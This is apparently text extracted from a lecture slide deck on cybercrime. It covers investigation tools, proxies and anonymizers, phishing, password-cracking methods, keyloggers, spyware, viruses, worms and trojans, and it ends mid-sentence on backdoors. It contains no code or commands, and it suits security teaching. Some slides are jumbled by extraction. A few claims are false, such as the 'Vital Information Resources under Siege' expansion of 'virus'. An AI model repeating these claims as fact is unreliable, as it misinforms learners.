CYBER AND NETWORK

SECURITY
UNIT-3
By: Rupanshi Patidar
Assistant Professor
 Cybercrime Investigation Tools

 Cybercrime investigation requires the use of specialized

tools and software to collect, preserve, and analyze
digital evidence. These tools can be used to identify
suspects, track their activities, and gather evidence to
build a case against them.
 Cybercrime Investigation Tools
Here are some of the most common cybercrime investigation
tools used by investigators:
1. Digital Forensics Software
 It is used to recover deleted files, analyze metadata, and
examine network traffic logs. Popular digital forensics
software includes tools like EnCase, FTK, and Autopsy.
2. Network Analysis Tools
 They are used to monitor network traffic, identify
suspicious activity, and track the flow of data. Network
analysis tools include tools like Wireshark, tcpdump, and
Netscout.
 Cybercrime Investigation Tools
3. Malware Analysis Tools
 They are used to analyze and reverse engineer malware to
understand its behavior and identify its source. Malware
analysis tools include IDA Pro, OllyDbg, and Binary Ninja.
4. Password Recovery Tools
 They are used to recover passwords from encrypted files,
databases, or other sources of digital evidence. Password
recovery tools include tools like Cain and Abel, John the Ripper,
and Hashcat.
5. Social Media Analysis Tools
 They are used to track suspects' activities and gather evidence
from social media platforms. Social media analysis tools include
tools like Hootsuite, Followerwonk, and Mention.
 Proxy Servers
 A proxy server is an intermediate server that sits
between a user's device and the internet. When a
user makes a request to access a website, the
request first goes to the proxy server, which then
forwards the request to the website. The website's
response is sent back to the proxy server, which
then sends it back to the user's device.
 It works as a gateway between the end-user and
the internet. It has its own IP address. It separates
the client system and web server from the global
network.
 Proxy Servers

 In other words, we can say that the proxy server

allows us to access any websites with a different IP
address. It plays an intermediary role between
users and targeted websites or servers. It collects
and provides information related to user requests.
The most important point about a proxy server is
that it does not encrypt traffic.
Proxy Servers
Proxy Servers
 Proxy Servers
 The proxy server accepts the request from the client
and produces a response based on the following
conditions:
 If the requested data or page already exists in the
local cache, the proxy server itself provides the
required retrieval to the client.
 If the requested data or page does not exist in the
local cache, the proxy server forwards that request
to the destination server.
 The proxy servers transfer the replies to the client
and also being cached to them.
 Types of Proxy Servers

 Forward Proxy - A forward proxy is a server

that sits between a client and the internet.
The client sends a request to the forward
proxy, which then sends the request to the
internet on behalf of the client.
 Types of Proxy Servers

 Reverse Proxy - A reverse proxy is a server that

sits between the internet and a server. The
reverse proxy receives requests from the
internet and then forwards those requests to the
appropriate server. The most popular reverse
proxies are Varnish and Squid
 Types of Proxy Servers
 Transparent Proxy - A transparent proxy is a proxy
that does not modify the request or response, but
simply passes the traffic along. Transparent proxies
are often used in corporate environments to
monitor and control access to the internet.
 Non-Transparent Proxy: It is an intermediary that
alters the solicitation reaction to offer some extra
types of assistance to the client. Web demands are
straightforwardly shipped off the intermediary
paying little mind to the worker from where they
started.
 Types of Proxy Servers

 Anonymous Proxy - An anonymous proxy is a proxy that

conceals the user's IP address, providing an additional
layer of privacy.
 Shared Proxy: A shared proxy server is used by more
than one user at a time. It provides an IP address to the
client that can be shared with other clients. It also allows
users to select the location from where the user wants to
search. It is ideal for users who do not want to spend a
lot of money on a fast connection. Low cost is an
advantage of it. The disadvantage of it is that a user can
be get blamed for someone else's mischievous activity.
For this reason, the user can be blocked from the site.
 Types of Proxy Servers
 HTTP Proxy: HTTP proxies are those proxy servers that are
used to save cache files of the browsed websites. It saves
time and enhances the speed because cached files reside in
the local memory. If the user again wants to access the
same file proxy itself provides the same file without
actually browsing the pages.
 Data Center Proxy: It is a special type of proxy that is not
affiliated with the ISP. It is provided by other corporations
through a data center. These servers can be found in
physical data centers. It is ideal for clients who want quick
responses. It does not provide high-level anonymity. For
this reason, it can put client information at high risk.
 Types of Proxy Servers

 DNS Proxy: DNS proxy take requests in the form

of DNS queries and forward them to the Domain
server where it can also be cached, moreover
flow of request can also be redirected.
 Rotating Proxy: A rotating proxy assign a new or
different IP address to each user that connects
to proxy. As users connect, the unique address is
assign to it.
 Types of Proxy Servers

 Tor Onion Proxy: This server aims at online anonymity to the

user’s personal information. It is used to route the traffic
through various networks present worldwide to arise
difficulty in tracking the users’ address and prevent the
attack of any anonymous activities. It makes it difficult for
any person who is trying to track the original address. In this
type of routing, the information is encrypted in a multi-
folds layer. At the destination, each layer is decrypted one
by one to prevent the information to scramble and receive
original content. This software is open-source and free of
cost to use.
 Anonymizers

 An anonymizer is a proxy server that makes Internet

activity untraceable. An anonymizer protects personally
identifying information by hiding private information on
the user’s behalf. An anonymizer or an anonymous proxy
is a tool that attempts to make activity on the Internet
untraceable. It is a proxy server computer that acts as an
intermediary and privacy shield between a client
computer and the rest of the Internet. It accesses the
Internet on the user’s behalf, protecting personal
information by hiding the client computer’s identifying
information.
 Anonymizers
There are several different types of anonymizers, including:
 VPN - A Virtual Private Network (VPN) is a type of anonymizer that
creates an encrypted connection between the user's device and the
internet. All traffic between the device and the internet is routed
through the VPN, which conceals the user's IP address and provides
an additional layer of security.
 TOR - The Onion Router (TOR) is a free software program that is used
to conceal a user's online activity by routing their traffic through a
network of servers. TOR is designed to be extremely difficult to trace,
making it a popular choice for users who need to conceal their
identity.
 Web-based anonymizers - Web-based anonymizers are online tools
that allow users to browse the internet without revealing their IP
address. These tools work by routing traffic through a third-party
server, making it difficult for websites to track the user's online
 Anonymizers
Benefits of Anonymizers
 Anonymizers can provide users with a layer of privacy when accessing
the internet, helping to conceal their online activity from prying eyes.
 Anonymizers can help protect users from malware, viruses, and other
types of attacks by creating an encrypted connection between the
user's device and the internet.
 Anonymizers can be used to access content that may be blocked or
restricted in certain locations, such as geo-restricted content or
websites that may be blocked by government or institutional firewalls.
 Anonymizers can help protect a user's identity and personal
information from being tracked and monitored by third parties, such as
advertisers or hackers.
 Anonymizers can also provide improved performance when browsing
the internet, as they can reduce load times for certain types of content
and reduce bandwidth usage.
 Phishing
 Phishing attack is when someone deliberately tries to
obtain your username and password to use them in a
malicious way. These individuals want your username and
password to send spam or more seriously infiltrate the
University’s network. Do not be tricked into giving away
your username or password.
 Most phishing is conducted by email. Some attacks are
pretty obvious. For example, "Your mail box is over quota,
please reply to this email including your username and
password to get more quota". Or you may be provided
with a ‘link’ in an email that takes you to a form that asks
for your username and password.
Example of phishing email
 Phishing
 A few characteristics give away that this is a good example of a phishing
email. They are:
 The recipient is addressed as 'Dear User'. This email is sent by someone
who has no idea who you are. The University, when it sends email to
students, will know who you are, and will not use a 'Dear User' instead
of your name.
 Incorrect capitals in the first sentence, the phrase 'Very Important' is
capitalised and placed just before the 'Click here' link to provide a sense
of urgency to click the link.
 The University does not need you to click on links to enable 'mail
management and Virus Scanning'.
 Spelling errors. The space between 'terminated' and 'in' is missing.
 The use of phrases like 'failure to adhere to our urgent notice' is pretty
characteristic of a phishing attempt.
 The mail is not signed by a person.
 Phishing
What to look out for in phishing scams
 1. Deals and offers that are too good to be true.
 2. Unknown or unusual senders.
 3. Hyperlinks and attachments.
 4. Web address spelled incorrectly.
 5. Immediate pop-ups.
 Identity Theft

 Identity Theft also called Identity Fraud is a crime that is

being committed by a huge number nowadays. Identity
theft happens when someone steals your personal
information to commit fraud. This theft is committed in
many ways by gathering personal information such as
transactional information of another person to make
transactions. Identity theft occurs when someone uses
another person's personal information, such as name,
Social Security number, driver's license number, credit
card number etc.
 Identity Theft
Frequent methods used to steal an identity include:
 Over-sharing personal information on social media, such as
birthdays, hometowns, and online resumes.
 Sharing location information via photos, such as geo-tagging
and location check-ins.
 Inadvertently revealing personal financial institutions through
social media profiles, usually via a "like" or a "favorite."
 5 Signs Of Identity Theft
1. Delayed arrival of bills and financial statements. This
kind of delay may indicate cyber criminals have changed
the mailing address for your accounts or are stealing
from your mailbox.
2. Unexpected calls from creditors about outstanding
charges and balances on existing accounts or for
accounts and charges you did not make.
3. New account confirmation from a bank, credit card
company, or online business you are not associated with.
4. Credit card charges and bank account transactions that
you did not make.
5. Cancellation notices of utilities or services.
Types of Identity Theft
 Identity Theft
How to protect yourself from identity theft
 Secure your connection: If you are going to use your
personal information online, make sure you do so only
when your connection is secure – preferably via home or
corporate network or cellular data. If possible, avoid public
Wi-Fi with no password protection. Should you have no
other choice, use a virtual private network (VPN) that will
encrypt all your communication and thus protect you from
eavesdropping criminals.
 Keep your devices secure: Protect your laptop, smartphone
and tablet from malicious software and attackers by using a
reliable, multi-layered, up-to-date security solution.
 How does phishing relate to identity
theft?
 Beside crafting emails that look convincing, phishing
attacks usually make use of fake websites and a multitude of
clever tactics to take the victim’s personal and financial
information, which then can be used to impersonate the victim.
 For example, if someone received an email from their bank
provider alerting them that their online account has been
temporarily suspended due to suspicious behavior, they might
panic and attempt to secure their account according to the
methods described in the email. This method will usually link
the victim to a fake website set up by the attacker to mimic the
bank’s login page. In that state, they might enter their login
credentials as normal without trying to make sure that the
website really belongs to the bank or not. And just like that,
your bank account information will be sent to the attacker.
 How does phishing relate to identity
theft?
 Once cybercriminals have your data, you’re a victim of
identity theft.
 If they have sufficient information on you, they can use
your name, address, or credit card details to fool
institutions to think that they’re acting on your behalf. For
example, if they gain enough control of your devices and
bank accounts, they can initiate transfer of funds from
your account to theirs without your knowledge (of
course, the transfer will be online and made anonymously
to avoid detection).
 Password Cracking
 Password cracking (also called password hacking) is
an attack vector that involves hackers attempting to
crack or determine a password for unauthorized
authentication. Password hacking uses a variety of
programmatic techniques, manual steps, and
automation using specialized tools to compromise a
password.
 The shorter and simpler your password, the easier
it is to crack. An eight-character complex password
takes around five minutes to crack while one with
six or fewer characters could be cracked instantly.
 How do I know if my password has
been cracked?
 Unauthorized access: if you notice unfamiliar or suspicious activity
on your accounts or systems, it might indicate a security breach.
 Password change: if you receive notifications about password
changes that you didn’t initiate, someone may have accessed your
account.
 Unsolicited emails or messages: phishing emails or messages sent
from your own accounts can be a sign that your password has been
compromised.
 Changes to account information: modifications to your account
settings without your knowledge, such as email address or recovery
options, could be a red flag.
 Unfamiliar devices or locations: if you notice unfamiliar devices or
IP addresses in your account activity, it may indicate a security
breach.
 5 Common password cracking
techniques
 1. Brute-force attack
 2. Dictionary attack
 3. Credential stuffing attack
 4. Hybrid attack
 5. Rainbow table attack
 1. Brute-force attack
 In this method, the attacker repeatedly attempts to guess a
password by systematically trying every possible character
combination until a valid password is found. In this attack, the
attacker uses a password-cracking tool that generates a list of
possible passwords. The software tool can try different
character combinations, including uppercase and lowercase
letters, symbols, and numerical digits, and it can also try
numerous word and phrase variations that are commonly used
as passwords.
 If a password is equivalent to using a key to open a door, a
brute force attack is using a battering ram. A hacker can try
2.18 trillion password/username combinations in 22 seconds,
and if your password is simple, your account could be in the
crosshairs.
 2. Dictionary attack

 These attacks are similar to brute-force attacks, but they’re less

about quantity and more about quality. In other words, instead
of trying every possible combination, bad actors start with the
assumption that users are likely to follow certain patterns when
they create a password. So they will home in on the most likely
words rather than trying everything.
 Some users pick easy to remember passwords, like “password” or
“123abc.” Others follow predictable patterns that can vary by
region—users might pick words related to their favorite sports
teams, local landmarks, city names, and so on.
 3. Credential stuffing attack
 With credential stuffing, bad actors take advantage the
tendency for users to reuse the same usernames and
passwords for multiple accounts.
 Here’s how it works. Pairs of compromised usernames and
passwords are added to a botnet that automates the process
of trying those credentials on multiple sites at the same time.
The purpose of these attacks is to identify account
combinations that work and can be re-used across multiple
sites.
 If you've suffered a hack in the past, you know that your old
passwords were likely leaked onto a disreputable website.
Credential stuffing takes advantage of accounts that never had
their passwords changed after an account break-in.
 4. Hybrid attack
 When users change their password, they’ll often add a few
extra numbers, letters or characters at the end. Hybrid
attacks take advantage of this tendency.
 Often, hybrid attacks are a mix of dictionary attacks and
brute force. In this case, a bad actor may get a user’s
compromised password for one site. The user learns it has
been compromised and changes it. The attacker will now try
out variations of the old password using a brute force
method that automates the additions of numbers, letters and
more.
 While this method is more time-consuming than a simple
dictionary attack, it’s faster than a brute-force attack.
 5. Rainbow table attack
 To keep passwords safe, any responsible organization that stores
passwords won’t keep them in their original plaintext form.
Rather, they use a hashing algorithm to convert passwords into
a string of seemingly random letters and numbers.
 But there are only a limited number of hashing algorithms. And
they hash the same passwords the same way every time. As a
result, attackers can develop databases of common passwords
that they’ve been able to decode. Once they have deciphered a
password, they store it in a database called a rainbow table.
 When attacker gets a new hashed password, they check to see if
it matches any of the precomputed hashes stored in their
rainbow table. The downside to rainbow tables is that they take
considerable time and effort to create. And they often don’t
work on passwords that have been salted.
 Tips to protect your organization
against password attacks
 Create strong password policies. Users don’t typically have the best
password hygiene. Consider a password policy that requires a minimum
passphrase length (ideally greater than 20 characters), requires the use of
special characters, and forces users to reset their passwords regularly.
 Use multifactor authentication. When MFA is used, password cracking is
mostly neutralized (though a growing number of attacks employ MFA-
bypass techniques). An attacker might figure out a user’s password, but in
many cases, they still won’t have access to the secondary authentication
method.
 Encrypt, hash and salt passwords. Both encrypting and hashing
exponentially increase the effort and the computing power that’s required
for attacks. And salting makes the process that even harder.
 Update systems regularly. When systems aren’t updated, malware that
tracks users’ keystrokes can infect emails, files and applications. In these
so-called keystroke attacks, bad actors gather user credentials and other
sensitive information. Updated systems can prevent these attacks.
 Keylogger
 Imagine if someone had access to everything
you type? While it can sometimes be done
legally, keylogging is a form of data monitoring
used to surreptitiously acquire people’s
personal information.
 A keylogger (or keystroke logger) is a type
of spyware that monitors and records what
you type on your computer or mobile phone.
Keylogging software or hardware can be used to
monitor activity for legal or illegal purposes.
 Keylogger
 Keystroke malware can be delivered in a number of ways:
• Phishing emails: By clicking a link or downloading an attachment in a
phishing email, text message, instant message, or social media post,
you could accidentally download malware designed to track
keystrokes.
• Trojan viruses: Named after the giant wooden horse that Greeks used
to infiltrate Troy during the Trojan War, hackers trick users into
downloading a Trojan virus by disguising it as a legitimate file or
application.
• Zero-day exploit: A zero-day exploit happens when hackers discover
an existing software security flaw and exploit it. Once developers
learn of the vulnerability, it’s too late to protect users. These are
particularly dangerous because once the systems are infected, they’re
more susceptible to further attacks.
• Infected systems: Keyloggers can take advantage of an already-
infected device or system and install other malicious software into
that system.
 Types of Keylogger
• Software Keyloggers: These are the software
programs or scripts installed on a target system
to capture and record keystrokes as users type.
• Hardware Keyloggers: These are hardware
devices attached between the keyboard and the
computer or embedded within a computer
peripheral.
• Memory-Injection Keyloggers: These keyloggers
inject malicious code into running processes to
capture keystrokes or intercept data.
 Types of Keylogger
• Mobile Keyloggers: These target
smartphones and tablets, capturing
touch inputs and virtual keyboard
keystrokes.
• Form Grabbing Keyloggers: These
keyloggers target web forms, capturing
the data entered by a user before it is
encrypted and sent to the server.
• Acoustic Keyloggers: These unique
keyloggers use sound to capture
keystrokes. By analyzing the sound of
typing, attackers can reconstruct what
keys were pressed.
How to Detect
a Keylogger?
 Indicators that can help to
detect keyloggers:
• Unusual system slowdowns
• Unexpected increase in
network traffic
• Suspicious behavior of
antivirus or security software
• Unexplained pop-ups or
browser redirects
• Passwords or accounts
compromised without reason
• Exceptional battery drainage
on mobile devices
 How to Prevent a
 Keylogger
Here Attack?
are some common keylogger prevention tips:
• Use reputable antivirus and anti-malware software
• Enable a firewall to block unauthorized access
• Use a virtual keyboard for sensitive tasks
• Be cautious when using public systems or networks
• Regularly update your operating system and applications
• Implement two-factor authentication for online accounts
• Regularly monitor your accounts for unauthorized activities
• Consider using a hardware-based authentication method
• Educate yourself about phishing and social engineering
tactics
• Be cautious about downloading files from untrusted
sources or clicking suspicious links or email attachments
 1. Check your software inventory.
Successful keystroke logger detection
starts with taking stock of the
programs and processes running on
your computer. While many of these
apps may have unfamiliar or even
suspicious-looking names, some may
blend in with the names of other
How to software and be harder to spot.
detect
2. Check your browser extensions.
and Some keylogging malware is designed
remove specifically to monitor your web usage
keylogg and may show up as a browser
extension. Check your browser menu
ers
and the list of active extensions. If
there are any you don’t recognize or
didn’t download, deactivate and
remove them.
 3. Remove keyloggers: Keyloggers can be
removed in much the same way as you
would remove other forms of malware.
Always exercise caution when handling
computer programs — even if one seems
suspicious, it could be a necessary tool, and
disabling it could cause problems. If you’re
certain a program is a keylogger, disable it,
How to uninstall it, and delete it from your
detect device.
and 4. What to do if you don’t find a keylogger:
If you fail to identify any malicious
remove
keyloggers, you could reinstall your
keylogg device’s operating system or perform a
ers factory reset, which will effectively wipe all
the data and programs from your device
that were installed over the factory default
settings.
 Spyware
 Spyware is malicious software that
enters a user's computer, gathers data
from the device and user, and sends it
to third parties without their consent.
 Spyware is one of the most commonly
used cyberattack methods that can be
difficult for users and businesses to
identify and can do serious harm to
networks.
 Adware: Malicious adware is often bundled with
free software, shareware programs and utilities
downloaded from the internet or surreptitiously
installed onto a user's device when the user visits
an infected website.
 Cookies: Cookies that track and record users'
personally identifiable information (PII) and
internet browsing habits are one of the most
common types of adware. An advertiser might use
tracking cookies to track what webpages a user
visits in order to target advertising in a contextual
marketing campaign
 Keylogger: Keyboard loggers. Keyloggers are a type
of system monitor that cybercriminals often use to
steal PII, login credentials and sensitive enterprise
data. Employers may also use keyloggers to observe
employees' computer activities; parents to
supervise their children's internet usage; device
owners to track possible unauthorized activity on
their devices; or law enforcement agencies to
analyze incidents involving computer use.
 Trojans: Trojans are typically malware programs that
are disguised as legitimate software. A victim of a
Trojan could unknowingly install a file posing as an
official program, enabling the Trojan to access the
computer. The Trojan can then delete files, encrypt
files for ransom or enable other malicious actors to
have access to the user's information.
 Mobile Spyware
 Mobile spyware. Mobile spyware is dangerous
because it can be transferred through Short
Message Service or Multimedia Messaging Service
text messages and typically does not require user
interaction to execute commands. When a
smartphone or tablet gets infected with mobile
spyware that is sideloaded with a third-party
app, the phone's camera and microphone can be
used to spy on nearby activity, record phone
calls, and log browsing activity and keystrokes. The
device owner's location can also be monitored
through the Global Positioning System (GPS) or the
mobile computing device's Accelerometer.
 How do you remove spyware?
 If users determine that spyware has infected the system, they should perform the
following steps:
1. Disconnect the internet connection.
2. Check the device's programs list to see if the unwanted software is listed. If it is,
choose to remove it from the device. After uninstalling the program, reboot the
entire system.
3. If the above step does not work, run a scan of the system using a reputable
antivirus software. The scan should find suspicious programs and ask the user to
either clean, quarantine or delete the software.
4. The user can also download a virus removal tool or antispyware tool and allow it
to run through the system.
 If none of the above steps work, then the user will have to access the device's HD
in safe mode. However, this requires a tool that enables the user to access the
spyware folders and manually delete them. While this sounds complicated, the
process should only take a few minutes.
 Antispyware tools
• Malwarebytes is an antimalware and spyware tool that
can remove spyware from Windows, macOS, Chrome
OS, Android and iOS. Malwarebytes can scan through
registry files, running programs, HDs and individual
files. Once a spyware program is detected, a user can
quarantine and delete it. However, users cannot set up
automatic scanning schedules.
• Trend Micro HouseCall is another antispyware tool
that does not require user installation, so it uses
minimal processor and memory resources and disk
space. However, like Malwarebytes, users cannot set
automatic scans.
 Antispyware tools

 Windows Defender is a Microsoft antimalware product

that is included in the Windows 10 OS under Windows
Defender Security Center. The software is a lightweight
antimalware tool that protects against threats such as
spyware, adware and viruses. Windows Defender
includes features such as protection against phishing
sites, real-time threat detection and parental controls.
Windows Defender users can set automatic quick and full
scans, as well as set alerts for low, medium, high and
severe priority items.
 What are common examples of
spyware?
• CoolWebSearch uses security vulnerabilities found in Internet Explorer
to take control, change settings and send browsing information to
spyware authors.
• DarkHotel is a targeted spear phishing spyware that selectively attacks
business hotel visitors through the hotel's Wi-Fi network.
• Emotet was one of the most prevalent threats in the 2010s. It acted as a
Trojan that stole banking credentials from its victims.
• Gator is commonly found in file sharing software. It monitors a victim's
web browsing habits to present the user with better-targeted ads.
• TIBS Dialer disconnects the user's computer from local phone lines and
connects it to a toll number designed for accessing illegal websites.
• Zlob downloads itself onto a computer to record keystrokes and search
a user's browsing history.
 Virus
 Virus stands for Vital Information Resources under Siege. It refers
to the type of malicious software or malware that can cause
damage to your data, files, and software through replication.
 A computer virus is a program that spreads by first infecting files
or the system areas of a computer or network router's hard drive
and then making copies of itself. Some viruses are harmless,
others may damage data files, and some may destroy files. Viruses
used to be spread when people shared floppy disks and other
portable media, now viruses are primarily spread through email
messages.
 Unlike worms, viruses often require some sort of user action (e.g.,
opening an email attachment or visiting a malicious web page) to
spread.
 Virus
 What do viruses do?

A virus is simply a computer program--it can do

anything that any other program you run on your
computer can do. Some viruses are designed to
deliberately damage files, and others may just
spread to other computers.
 Common Signs of Computer
Viruses
 1. Speed of system
 2. Pop-up windows
 3. Programs self-executing
 4. Accounts being logged out
 5. Crashing of the device
 6. Mass emails being sent from your email account
 7. Changes to your homepage
 Types of Computer Viruses
 1. Resident virus
 2. Multipartite virus
 3. Direct action
 4. Browser hijacker
 5. Overwrite virus
 6. Web scripting virus
 7. File infector
 8. Network Virus
 9. Macro Virus
 10. Boot Sector Virus
 11. Encrypted Virus
 Resident Virus: The Resident virus is a type of malware
that targets the memory file of the computer system. It is
considered the worst one as they get attached to the files
of antivirus software and corrupt them too.
Examples − Meve, CMJ and Randex.

 Multipartite Virus:It is the fastest virus that affects the

executables files and system boot sector simultaneously.
It affects multiple parts namely the memory and the
operating system.
Examples − Invader and Flip
 Direct Action: A direct action virus accesses a computer’s main
memory and infects all programs, files, and folders located in
the autoexec.bat path, before deleting itself. This virus typically
alters the performance of a system but is capable of destroying
all data on the computer’s hard disk and any USB device
attached to it.

 Browser Hijacker: A browser hijacker manually changes the

settings of web browsers, such as replacing the homepage,
editing the new tab page, and changing the default search
engine. Technically, it is not a virus because it cannot infect files
but can be hugely damaging to computer users, who often will
not be able to restore their homepage or search engine.
Browser hijackers typically attach to free software
and malicious applications from unverified websites or app
stores.
 Overwrite Virus: Overwrite viruses are extremely dangerous.
They can delete data and replace it with their own file content
or code. Once files get infected, they cannot be replaced, and
the virus can affect Windows, DOS, Linux, and Apple systems.
The only way this virus can be removed is by deleting all of the
files it has infected, which could be devastating.

 Web Scripting Virus: A web scripting virus attacks web browser

security, enabling a hacker to inject web-pages with malicious
code, or client-side scripting. This allows cyber criminals to
attack major websites, such as social networking sites, email
providers, and any site that enables user input or reviews.
Attackers can use the virus to send spam, commit fraudulent
activity, and damage server files.
 File Infector Virus: This type of virus infects the system by
appending itself to the end of a file. It changes the start of a
program so that the control jumps to its code. After the
execution of its code, the control returns back to the main
program. Its execution is not even noticed. It is also called
a Parasitic virus because it leaves no file intact but also leaves
the host functional.

 Network Virus: Network viruses are extremely dangerous

because they can completely cripple entire computer
networks. They are often difficult to discover, as the virus
could be hidden within any computer on an infected network.
These viruses can easily replicate and spread by using the
internet to transfer to devices connected to the network.
 Macro Virus: Unlike most viruses which are written in a
low-level language(like C or assembly language), these
are written in a high-level language like Visual Basic.
These viruses are triggered when a program capable of
executing a macro is run. For example, the macro viruses
can be contained in spreadsheet files.

 Boot Sector Virus: It infects the boot sector of the

system, executing every time system is booted and
before the operating system is loaded. It infects other
bootable media like floppy disks. These are also known
as memory viruses as they do not infect the file systems.
 Encrypted Virus : In order to avoid detection by
antivirus, this type of virus exists in encrypted
form. It carries a decryption algorithm along with
it. So the virus first decrypts and then executes.
 How To Prevent Your Computer From
Viruses
 1. se a trusted antivirus product
 2. Avoid clicking pop-up advertisements
 3. Scan your email attachments
 4. Scan the files that you download using file-
sharing programs
 Worms
 A worm virus refers to a malicious program that replicates
itself, automatically spreading through a network. In this
definition of computer worms, the worm virus exploits
vulnerabilities in your security software to steal sensitive
information, install backdoors that can be used to access
the system, corrupt files, and do other kinds of harm.
 Is a worm a virus?
 No. A worm is not a virus, although like a virus, it can
severely disrupt IT operations and cause data loss. A worm
is actually much more serious than a virus because once it
infects a vulnerable machine, it can “self-replicate” and
spread automatically across multiple devices.
 Worms
 Most common ways a worm spreads
• Email: Email attachments remain popular hiding spots for
worms.
• Networks: Worms can self-propagate across connected
networks.
• System vulnerabilities: Some worms are specifically coded
to take advantage of operating system and software
vulnerabilities.
• File sharing: Peer-to-peer (P2P) file networks can carry
malware like worms.
• Instant messaging (IM): Worms can spread through instant
messaging platforms such as Internet Relay Chat (IRC).
 Classifications and Names of
Worms
Email Worms As the name suggests, an email worm spreads via email. Also known
as a mass-mailer worm, an email worm distributes a copy of itself as
an email attachment or as a link to an infected file on a compromised
or hacker-owned website.

File-Sharing File-sharing worms embed and disguise themselves as innocent

Worms media files. When an unsuspecting user downloads the file, the
worm infects their device. Once the worm has compromised the
device, it can capture confidential information that the adversary can
use to their advantage or sell to other attackers.

IM Worms IM worms masquerade as attachments and links on social media

platforms, and they frequently include content that baits the victim
to click on the URL. Once it’s executed, the IM worm can spread
through an instant messaging network.
 Classifications and Names of
Worms
Cal A cryptoworm is a worm attack that encrypts
data on the victim's system and then demands
a ransom payment to regain access to the data.

IRC Worms An IRC worm is a malicious program designed to

exploit IRC channels to infect chat rooms and
message forums by sending infected messages.

P2P Worms P2P worms use the mechanisms of P2P

networks to distribute copies to unsuspecting
P2P users.
 Classifications and Names of
Worms
 Morris
 In 1988, MIT graduate student Robert Morris distributed the
Morris worm, which increased the
load on over 6,000 UNIX machines across the country, causing
them to crash. Although Morris’ intentions were not malicious,
the worm caused between $100,000 and $10 million in
damage. It also resulted in the first felony conviction in the U.S.
under the 1986 Computer Fraud and Abuse Act.
 SQL Slammer
 SQL Slammer is a 2003 computer worm that caused a denial of
service on some internet hosts, delayed general internet
traffic, and crashed routers all around the world. It spread
quickly, infecting the vast majority of its 75,000 victims within
10 minutes.
 Classifications and Names of
Worms
 Mydoom
 Mydoom is a computer worm that targets Windows
computers and is regarded as one of the most rapidly
spreading worms in history, infecting millions of machines
since its release in 2004. Mydoom caused an estimated
damage of $38 billion in 2004, and the worm is still around
today, accounting for 1% of all malicious emails.
 Storm Worm
 Debuting in 2007, the Storm Worm attacked millions of
computers using an email about a recent weather disaster
in Europe, baiting recipients with a doomsday subject line:
“230 dead as storm batters Europe.”
Classifications and Names
of Worms
 Duqu
 Duqu is a sophisticated computer worm that was first
discovered in 2011. It is thought to have been
produced by the same people that generated the
Stuxnet worm, which caused Iranian nuclear turbines
to fail in 2010. Duqu has a valid but abused digital
signature and collects information that could be
useful in attacking industrial control systems.
 Signs of a worm infection
• Slow system performance stemming from high CPU
resource usage
• Hidden or missing files and folders
• Emails sent to your contacts without your awareness
• Computer programs crashing without warning
• Mysterious files or programs that you didn’t install on the
computer
• Programs running or websites launching automatically
• Unusual browser performance or program behavior
 Prevention
• Use endpoint protection software
• Implement employee awareness training
• Use DNS filtering
• Update software and patch systems
 Trojan Horse
 A Trojan Horse Virus is a type of malware that downloads
onto a computer disguised as a legitimate program. The
delivery method typically sees an attacker use social
engineering to hide malicious code within legitimate
software to try and gain users' system access with their
software.
 A simple way to answer the question "what is Trojan" is it is
a type of malware that typically gets hidden as an
attachment in an email or a free-to-download file, then
transfers onto the user’s device. Once downloaded, the
malicious code will execute the task the attacker designed it
for, such as gain backdoor access to corporate systems, spy
on users’ online activity, or steal sensitive data.
 How Does Trojan Horse Work?

 Unlike computer viruses, a Trojan horse cannot manifest

by itself, so it needs a user to download the server side of
the application for it to work. This means the executable
(.exe) file should be implemented and the program
installed for the Trojan to attack a device’s system.
 A Trojan virus spreads through legitimate-looking emails
and files attached to emails, which are spammed to reach
the inboxes of as many people as possible. When the email
is opened and the malicious attachment is downloaded,
the Trojan server will install and automatically run every
time the infected device is turned on.
 How Does Trojan Horse Work?
 A computer infected by Trojan malware can also spread it
to other computers. A cyber criminal turns the device
into a zombie computer, which means they have remote
control of it without the user knowing. Hackers can then
use the zombie computer to continue sharing malware
across a network of devices, known as a botnet.
 Trojans can also attack and infect smartphones and
tablets using a strand of mobile malware. This could occur
through the attacker redirecting traffic to a device
connected to a Wi-Fi network and then using it to launch
cyberattacks.
 Types of Trojan Malware
1. Exploit Trojan: An exploit malware program contains code or data that takes
advantage of specific vulnerabilities within an application or computer system. The
cyber criminal will target users through a method like a phishing attack, then use the
code in the program to exploit a known vulnerability.
2. Downloader Trojan: A downloader Trojan targets a computer that has already been
infected by malware, then downloads and installs more malicious programs to it. This
could be additional Trojans or other types of malware like adware.
3. Ransom Trojan: Ransom Trojans seek to impair a computer’s performance or block
data on the device so that the user can no longer access or use it. The attacker will
then hold the user or organization ransom until they pay a ransom fee to undo the
device damage or unlock the affected data.Backdoor Trojan: The attacker uses the
malware to set up access points to the network.
4. Distributed Denial of Service (DDoS) attack Trojan: These Trojan programs carry out
attacks that overload a network with traffic. It will send multiple requests from a
computer or a group of computers to overwhelm a target web address and cause a
denial of service.
 Types of Trojan Malware
5. Fake AV Trojan: A fake antivirus Trojan simulates the actions of legitimate
antivirus software. The Trojan is designed to detect and remove threats like a
regular antivirus program, then extort money from users for removing threats
that may be nonexistent.
6. Rootkit Trojan: A rootkit is a type of malware that conceals itself on a user’s
computer. Its purpose is to stop malicious programs from being detected, which
enables malware to remain active on an infected computer for a longer period.
7. SMS Trojan: An SMS Trojan infects mobile devices and is capable of sending
and intercepting text messages. This includes sending messages to premium-rate
phone numbers, which increases the costs on a user’s phone bill.
8. Banking Trojan or Trojan Banker: A banker Trojan is designed to target users’
banking accounts and financial information. It attempts to steal account data for
credit and debit cards, e-payment systems, and online banking systems.
9. Trojan GameThief: A game-thief Trojan is specifically designed to steal user
account information from people playing online games.
 Types of Trojan Malware
10. Backdoor Trojan: A backdoor Trojan enables an attacker to
gain remote access to a computer and take control of it using a
backdoor. This enables the malicious actor to do whatever they
want on the device, such as deleting files, rebooting the
computer, stealing data, or uploading malware. A backdoor Trojan
is frequently used to create a botnet through a network of zombie
computers.
11. Spy Trojan: Spy Trojans are designed to sit on a user’s
computer and spy on their activity. This includes logging their
keyboard actions, taking screenshots, accessing the applications
they use, and tracking login data.
 Uses of Trojan Horse

1. Spy: Some Trojans act as spyware. It is designed to take

the data from the victim like social
networking(username and passwords), credit card
details, and more.
2. Creating backdoors: The Trojan makes some changes
in the system or the device of the victim, So this is
done to let other malware or any cyber criminals get
into your device or the system.
3. Zombie: There are many times that the hacker is not at
all interested in the victim’s computer, but they want
to use it under their control.
 Backdoor
 A backdoor attack is a way to access a computer system
or encrypted data that bypasses the system's customary
security mechanisms. A developer may create a
backdoor so that an application, operating system (OS)
